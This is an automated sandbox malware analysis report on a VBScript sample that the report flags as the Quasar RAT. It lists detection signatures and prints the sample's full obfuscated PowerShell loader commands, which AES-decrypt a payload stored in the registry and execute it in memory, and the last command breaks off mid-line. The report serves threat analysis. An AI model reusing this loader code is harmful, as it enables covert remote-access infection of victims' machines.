Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
test.vbs

Overview

General Information

Sample name:test.vbs
Analysis ID:1612297
MD5:3808fc59fa6559e0400c8c114757cb69
SHA1:a920afd77fcadfc2df8d5f7114c636f0938406f4
SHA256:9b7f05da0f9dfe94f3b6dcb325e6eb08f50333d5bf7d88da97fbcb51986b1bf9
Infos:

Detection

Quasar
Score:100
Range:0 - 100
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Quasar RAT
.NET source code contains potential unpacker
Creates autostart registry keys with suspicious values (likely registry only malware)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Modifies the context of a thread in another process (thread injection)
Sample uses string decryption to hide its real strings
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes or reads registry keys via WMI
Writes registry values via WMI
Wscript starts Powershell (via cmd or directly)
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7956 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\test.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WmiPrvSE.exe (PID: 8116 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • cmd.exe (PID: 8164 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3mrl3mal3mpl3mhl3myl3m.l3mCl3mil3mpl3mhl3mel3mrl3mMl3mol3mdl3mel3m]l3m:l3m:l3mCl3mBl3mCl3m'.Replace('l3m', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire 'j0D$j0DEj0DLj0Dpj0Dtj0DFj0D.j0DPj0Daj0Ddj0Ddj0Dij0Dnj0Dgj0D=j0D[j0DSj0Dyj0Dsj0Dtj0Dej0Dmj0D.j0DSj0Dej0Dcj0Duj0Drj0Dij0Dtj0Dyj0D.j0DCj0Drj0Dyj0Dpj0Dtj0Doj0Dgj0Drj0Daj0Dpj0Dhj0Dyj0D.j0DPj0Daj0Ddj0Ddj0Dij0Dnj0Dgj0DMj0Doj0Ddj0Dej0D]j0D:j0D:j0DPj0DKj0DCj0DSj0D7j0D'.Replace('j0D', ''); Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire 'RLv$RLvERLvLRLvpRLvtRLvFRLv.RLvKRLveRLvyRLv=RLv[RLvSRLvyRLvsRLvtRLveRLvmRLv.RLvCRLvoRLvnRLvvRLveRLvrRLvtRLv]RLv:RLv:RLvFRLvrRLvoRLvmRLvBRLvaRLvsRLveRLv6RLv4RLvSRLvtRLvrRLviRLvnRLvgRLv(RLv$RLvHRLv2RLvoRLvURLvxRLv)RLv'.Replace('RLv', ''); Invoke-Expression -InformationAction Ignore -Verbose 'KoR$KoREKoRLKoRpKoRtKoRFKoR.KoRIKoRVKoR=KoR[KoRSKoRyKoRsKoRtKoReKoRmKoR.KoRCKoRoKoRnKoRvKoReKoRrKoRtKoR]KoR:KoR:KoRFKoRrKoRoKoRmKoRBKoRaKoRsKoReKoR6KoR4KoRSKoRtKoRrKoRiKoRnKoRgKoR(KoR$KoRqKoRBKoRAKoRgKoRsKoR)KoR'.Replace('KoR', ''); $ZcGu0=$ELptF.CreateDecryptor(); $ES1U8=$ZcGu0.TransformFinalBlock($ti34n, $B8Dta, $ti34n.Length); $ZcGu0.Dispose(); $ELptF.Dispose(); $ES1U8; } Invoke-Expression -Debug -WarningAction Inquire -Verbose 'rgH$rgHIrgH0rgHjrgHzrgHKrgH=rgH[rgHMrgHirgHcrgHrrgHorgHsrgHorgHfrgHtrgH.rgHWrgHirgHnrgH3rgH2rgH.rgHRrgHergHgrgHirgHsrgHtrgHrrgHyrgH]rgH:rgH:rgHCrgHurgHrrgHrrgHergHnrgHtrgHUrgHsrgHergHrrgH.rgHOrgHprgHergHnrgHSrgHurgHbrgHKrgHergHyrgH(rgH$rgHZrgHXrgHcrgHfrgH8rgH)rgH'.Replace('rgH', ''); $Ka32q = $iSxCm; $Yvese = $I0jzK.GetValue($hBkVc); $Yvese = S2qwV($Yvese); Invoke-Expression -Verbose -WarningAction Inquire -Debug -InformationAction Ignore 'wPR$wPRRwPR6wPRawPRNwPRAwPR=wPR[wPRRwPRewPRfwPRlwPRewPRcwPRtwPRiwPRowPRnwPR.wPRAwPRswPRswPRewPRmwPRbwPRlwPRywPR]wPR:wPR:wPRLwPRowPRawPRdwPR(wPR[wPRbwPRywPRtwPRewPR[wPR]wPR]wPR$wPRYwPRvwPRewPRswPRewPR)wPR'.Replace('wPR', ''); $JVyjT = $R6aNA.EntryPoint; $YsCbW = [int]$JVyjT.Invoke($B8Dta,$kzu3X); if ($YsCbW -eq $Ka32q) {exit $Ka32q } else {exit $l8XQf}}" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7252 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3mrl3mal3mpl3mhl3myl3m.l3mCl3mil3mpl3mhl3mel3mrl3mMl3mol3mdl3mel3m]l3m:l3m:l3mCl3mBl3mCl3m'.Replace('l3m', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire 'j0D$j0DEj0DLj0Dpj0Dtj0DFj0D.j0DPj0Daj0Ddj0Ddj0Dij0Dnj0Dgj0D=j0D[j0DSj0Dyj0Dsj0Dtj0Dej0Dmj0D.j0DSj0Dej0Dcj0Duj0Drj0Dij0Dtj0Dyj0D.j0DCj0Drj0Dyj0Dpj0Dtj0Doj0Dgj0Drj0Daj0Dpj0Dhj0Dyj0D.j0DPj0Daj0Ddj0Ddj0Dij0Dnj0Dgj0DMj0Doj0Ddj0Dej0D]j0D:j0D:j0DPj0DKj0DCj0DSj0D7j0D'.Replace('j0D', ''); Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire 'RLv$RLvERLvLRLvpRLvtRLvFRLv.RLvKRLveRLvyRLv=RLv[RLvSRLvyRLvsRLvtRLveRLvmRLv.RLvCRLvoRLvnRLvvRLveRLvrRLvtRLv]RLv:RLv:RLvFRLvrRLvoRLvmRLvBRLvaRLvsRLveRLv6RLv4RLvSRLvtRLvrRLviRLvnRLvgRLv(RLv$RLvHRLv2RLvoRLvURLvxRLv)RLv'.Replace('RLv', ''); Invoke-Expression -InformationAction Ignore -Verbose 'KoR$KoREKoRLKoRpKoRtKoRFKoR.KoRIKoRVKoR=KoR[KoRSKoRyKoRsKoRtKoReKoRmKoR.KoRCKoRoKoRnKoRvKoReKoRrKoRtKoR]KoR:KoR:KoRFKoRrKoRoKoRmKoRBKoRaKoRsKoReKoR6KoR4KoRSKoRtKoRrKoRiKoRnKoRgKoR(KoR$KoRqKoRBKoRAKoRgKoRsKoR)KoR'.Replace('KoR', ''); $ZcGu0=$ELptF.CreateDecryptor(); $ES1U8=$ZcGu0.TransformFinalBlock($ti34n, $B8Dta, $ti34n.Length); $ZcGu0.Dispose(); $ELptF.Dispose(); $ES1U8; } Invoke-Expression -Debug -WarningAction Inquire -Verbose 'rgH$rgHIrgH0rgHjrgHzrgHKrgH=rgH[rgHMrgHirgHcrgHrrgHorgHsrgHorgHfrgHtrgH.rgHWrgHirgHnrgH3rgH2rgH.rgHRrgHergHgrgHirgHsrgHtrgHrrgHyrgH]rgH:rgH:rgHCrgHurgHrrgHrrgHergHnrgHtrgHUrgHsrgHergHrrgH.rgHOrgHprgHergHnrgHSrgHurgHbrgHKrgHergHyrgH(rgH$rgHZrgHXrgHcrgHfrgH8rgH)rgH'.Replace('rgH', ''); $Ka32q = $iSxCm; $Yvese = $I0jzK.GetValue($hBkVc); $Yvese = S2qwV($Yvese); Invoke-Expression -Verbose -WarningAction Inquire -Debug -InformationAction Ignore 'wPR$wPRRwPR6wPRawPRNwPRAwPR=wPR[wPRRwPRewPRfwPRlwPRewPRcwPRtwPRiwPRowPRnwPR.wPRAwPRswPRswPRewPRmwPRbwPRlwPRywPR]wPR:wPR:wPRLwPRowPRawPRdwPR(wPR[wPRbwPRywPRtwPRewPR[wPR]wPR]wPR$wPRYwPRvwPRewPRswPRewPR)wPR'.Replace('wPR', ''); $JVyjT = $R6aNA.EntryPoint; $YsCbW = [int]$JVyjT.Invoke($B8Dta,$kzu3X); if ($YsCbW -eq $Ka32q) {exit $Ka32q } else {exit $l8XQf}}" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 6104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function Ib6pi([byte[]]$Sf4DZ) {Invoke-Expression -Verbose -WarningAction Inquire -Debug 'O2o$O2ocO2oqO2o1O2oaO2oGO2o=O2o[O2oSO2oyO2osO2otO2oeO2omO2o.O2oTO2oeO2oxO2otO2o.O2oEO2onO2ocO2ooO2odO2oiO2onO2ogO2o]O2o:O2o:O2oUO2oTO2oFO2o8O2o.O2oGO2oeO2otO2oSO2otO2orO2oiO2onO2ogO2o(O2o$O2oSO2ofO2o4O2oDO2oZO2o)O2o'.Replace('O2o', ''); return $cq1aG; } function Smsgn([byte[]]$TYS1W) {Invoke-Expression -Verbose -InformationAction Ignore 'StI$StIrStIwStIZStIwStIHStI=StI[StIBStIiStItStICStIoStInStIvStIeStIrStItStIeStIrStI]StI:StI:StITStIoStIIStInStItStI3StI2StI(StI$StITStIYStISStI1StIWStI,StI0StI)StI;StI'.Replace('StI', ''); return $rwZwH; } $yOU0b = Ib6pi(0x74<#chvvk#>,0x52<#u2CEY#>,0x6B<#MVTFN#>,0x58<#YiCr7#>,0x43<#K8mg9#>,0x36<#UhqQ4#>,0x6A<#cQm2O#>,0x2B<#flcxM#>,0x34<#OY2RT#>,0x5A<#ALzz6#>,0x6F<#zoKd3#>,0x52<#d4OvL#>,0x59<#SLwJ0#>,0x62<#zsa1m#>,0x79<#sFOep#>,0x47<#qGVN9#>,0x70<#Ks1U4#>,0x6F<#uGJ9p#>,0x4D<#kWql0#>,0x45<#EmsaU#>,0x75<#Ov8NF#>,0x6B<#uZpyF#>,0x6B<#XiBw9#>,0x43<#hUbO7#>,0x59<#ujaL4#>,0x46<#ZYnnj#>,0x42<#JY42r#>,0x51<#WtnPA#>,0x34<#YaV4N#>,0x2F<#HV4mN#>,0x46<#nKdcb#>,0x79<#lUwSl#>,0x64<#awCO3#>,0x34<#CnIFi#>,0x58<#uqMOd#>,0x4F<#YNg7w#>,0x4B<#HeBay#>,0x4E<#A4cb9#>,0x58<#F6Vnf#>,0x78<#kXGAK#>,0x2B<#ZMzDT#>,0x45<#E8P88#>,0x67<#Zyzgc#>,0x3D<#Auma2#>); $pKdS6 = Ib6pi(0x4E<#HLrGc#>,0x47<#xVisw#>,0x30<#EHfxR#>,0x52<#wp7Gt#>,0x63<#Cpdce#>,0x50<#OHyLe#>,0x37<#xvqHB#>,0x49<#PetlW#>,0x36<#lZgM3#>,0x7A<#TTBOg#>,0x75<#Rxgr0#>,0x45<#YsPlK#>,0x65<#qhXNz#>,0x65<#QaXw9#>,0x6F<#W6Vt9#>,0x32<#gIQiG#>,0x46<#yGjpJ#>,0x6F<#HP9Ri#>,0x77<#dPHbh#>,0x72<#KCTWk#>,0x34<#x6PPE#>,0x51<#VbwrN#>,0x3D<#RcqfM#>,0x3D<#l7sEq#>); $mxwaP = Ib6pi(0x53<#DbFNZ#>,0x6F<#Jy4Lx#>,0x66<#ez47J#>,0x74<#B1Uku#>,0x77<#kcRDO#>,0x61<#GimOz#>,0x72<#MUPpg#>,0x65<#a0Bz2#>,0x5C<#ehl3n#>,0x4D<#ZitVL#>,0x69<#smHT8#>,0x63<#fJC9S#>,0x72<#hMqWi#>,0x6F<#NkObo#>,0x73<#IzfrK#>,0x6F<#J1Yat#>,0x66<#dzRC7#>,0x74<#fM5r5#>,0x5C<#RyBgP#>,0x57<#T0PUW#>,0x69<#vTRqA#>,0x6E<#BHZJx#>,0x64<#mvlQt#>,0x6F<#p5nY6#>,0x77<#DohgT#>,0x73<#Sx8cw#>); $RGohu = Ib6pi(0x6B<#QlDDy#>,0x70<#NhkB5#>,0x44<#Zww3K#>,0x53<#eNvxb#>,0x46<#XM0XT#>); $RwltO = Smsgn(0x00<#h5SFV#>,0x00<#ucupc#>,0x00<#MID9v#>,0x00<#HXOXF#>); $ewoV8 = $true; $jOK5y = $null; function Yz1Gd($VHgBC) {Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore 'CKA$CKAeCKAyCKAyCKAQCKAHCKA=CKA[CKASCKAyCKAsCKAtCKAeCKAmCKA.CKASCKAeCKAcCKAuCKArCKAiCKAtCKAyCKA.CKACCKArCKAyCKApCKAtCKAoCKAgCKArCKAaCKApCKAhCKAyCKA.CKAACKAeCKAsCKA]CKA:CKA:CKACCKArCKAeCKAaCKAtCKAeCKA(CKA)CKA'.Replace('CKA', ''); Invoke-Expression -WarningAction Inquire -Verbose 'RHv$RHveRHvyRHvyRHvQRHvHRHv.RHvMRHvoRHvdRHveRHv=RHv[RHvSRHvyRHvsRHvtRHveRHvmRHv.RHvSRHveRHvcRHvuRHvrRHviRHvtRHvyRHv.RHvCRHvrRHvyRHvpRHvtRHvoRHvgRHvrRHvaRHvpRHvhRHvyRHv.RHvCRHviRHvpRHvhRHveRHvrRHvMRHvoRHvdRHveRHv]RHv:RHv:RHvCRHvBRHvCRHv'.Replace('RHv', ''); Invoke-Expression -Verbose -Debug -WarningAction Inquire -InformationAction Ignore 'jui$juiejuiyjuiyjuiQjuiHjui.juiPjuiajuidjuidjuiijuinjuigjui=jui[juiSjuiyjuisjuitjuiejuimjui.juiSjuiejuicjuiujuirjuiijuitjuiyjui.juiCjuirjuiyjuipjuitjuiojuigjuirjuiajuipjuihjuiyjui.juiPjuiajuidjuidjuiijuinjuigjuiMjuiojuidjuiejui]jui:jui:juiPjuiKjuiCjuiSjui7jui'.Replace('jui', ''); Invoke-Expression -Debug -Verbose 'YwM$YwMeYwMyYwMyYwMQYwMHYwM.YwMKYwMeYwMyYwM=YwM[YwMSYwMyYwMsYwMtYwMeYwMmYwM.YwMCYwMoYwMnYwMvYwMeYwMrYwMtYwM]YwM:YwM:YwMFYwMrYwMoYwMmYwMBYwMaYwMsYwMeYwM6YwM4YwMSYwMtYwMrYwMiYwMnYwMgYwM(YwM$YwMyYwMOYwMUYwM0YwMbYwM)YwM'.Replace('YwM', ''); Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire 'TrU$TrUeTrUyTrUyTrUQTrUHTrU.TrUITrUVTrU=TrU[TrUSTrUyTrUsTrUtTrUeTrUmTrU.TrUCTrUoTrUnTrUvTrUeTrUrTrUtTrU]TrU:TrU:TrUFTrUrTrUoTrUmTrUBTrUaTrUsTrUeTrU6TrU4TrUSTrUtTrUrTrUiTrUnTrUgTrU(TrU$TrUpTrUKTrUdTrUSTrU6TrU)TrU'.Replace('TrU', ''); $mz2vU=$eyyQH.CreateDecryptor(); $YW2cj=$mz2vU.TransformFinalBlock($VHgBC, $RwltO, $VHgBC.Length); $mz2vU.Dispose(); $eyyQH.Dispose(); $YW2cj; } Invoke-Expression -Verbose -InformationAction Ignore -Debug 'QTL$QTLsQTLbQTL3QTLLQTLKQTL=QTL[QTLMQTLiQTLcQTLrQTLoQTLsQTLoQTLfQTLtQTL.QTLWQTLiQTLnQTL3QTL2QTL.QTLRQTLeQTLgQTLiQTLsQTLtQTLrQTLyQTL]QTL:QTL:QTLCQTLuQTLrQTLrQTLeQTLnQTLtQTLUQTLsQTLeQTLrQTL.QTLOQTLpQTLeQTLnQTLSQTLuQTLbQTLKQTLeQTLyQTL(QTL$QTLmQTLxQTLwQTLaQTLPQTL,QTL$QTLeQTLwQTLoQTLVQTL8QTL)QTL'.Replace('QTL', ''); $I9CGV = $sb3LK.GetValue($RGohu); $I9CGV = Yz1Gd($I9CGV); $sb3LK.DeleteValue($RGohu); Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore 'GkW$GkWEGkWHGkWQGkWOGkW4GkW=GkW[GkWRGkWeGkWfGkWlGkWeGkWcGkWtGkWiGkWoGkWnGkW.GkWAGkWsGkWsGkWeGkWmGkWbGkWlGkWyGkW]GkW:GkW:GkWLGkWoGkWaGkWdGkW(GkW[GkWbGkWyGkWtGkWeGkW[GkW]GkW]GkW$GkWIGkW9GkWCGkWGGkWVGkW)GkW'.Replace('GkW', ''); $qYlCF = $EHQO4.EntryPoint; $qYlCF.Invoke($RwltO,$jOK5y);}" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5964 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function IrUjV([byte[]]$f9mpX) {Invoke-Expression -Verbose -Debug -InformationAction Ignore 'zZO$zZOSzZOfzZOYzZOszZO9zZO=zZO[zZOSzZOyzZOszZOtzZOezZOmzZO.zZOTzZOezZOxzZOtzZO.zZOEzZOnzZOczZOozZOdzZOizZOnzZOgzZO]zZO:zZO:zZOUzZOTzZOFzZO8zZO.zZOGzZOezZOtzZOSzZOtzZOrzZOizZOnzZOgzZO(zZO$zZOfzZO9zZOmzZOpzZOXzZO)zZO'.Replace('zZO', ''); return $SfYs9; } function SsYTA([byte[]]$MyDKV) {Invoke-Expression -WarningAction Inquire -Verbose 'RzW$RzWGRzWwRzW1RzWMRzWHRzW=RzW[RzWBRzWiRzWtRzWCRzWoRzWnRzWvRzWeRzWrRzWtRzWeRzWrRzW]RzW:RzW:RzWTRzWoRzWIRzWnRzWtRzW3RzW2RzW(RzW$RzWMRzWyRzWDRzWKRzWVRzW,RzW0RzW)RzW;RzW'.Replace('RzW', ''); return $Gw1MH; } $MXyPq = IrUjV(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 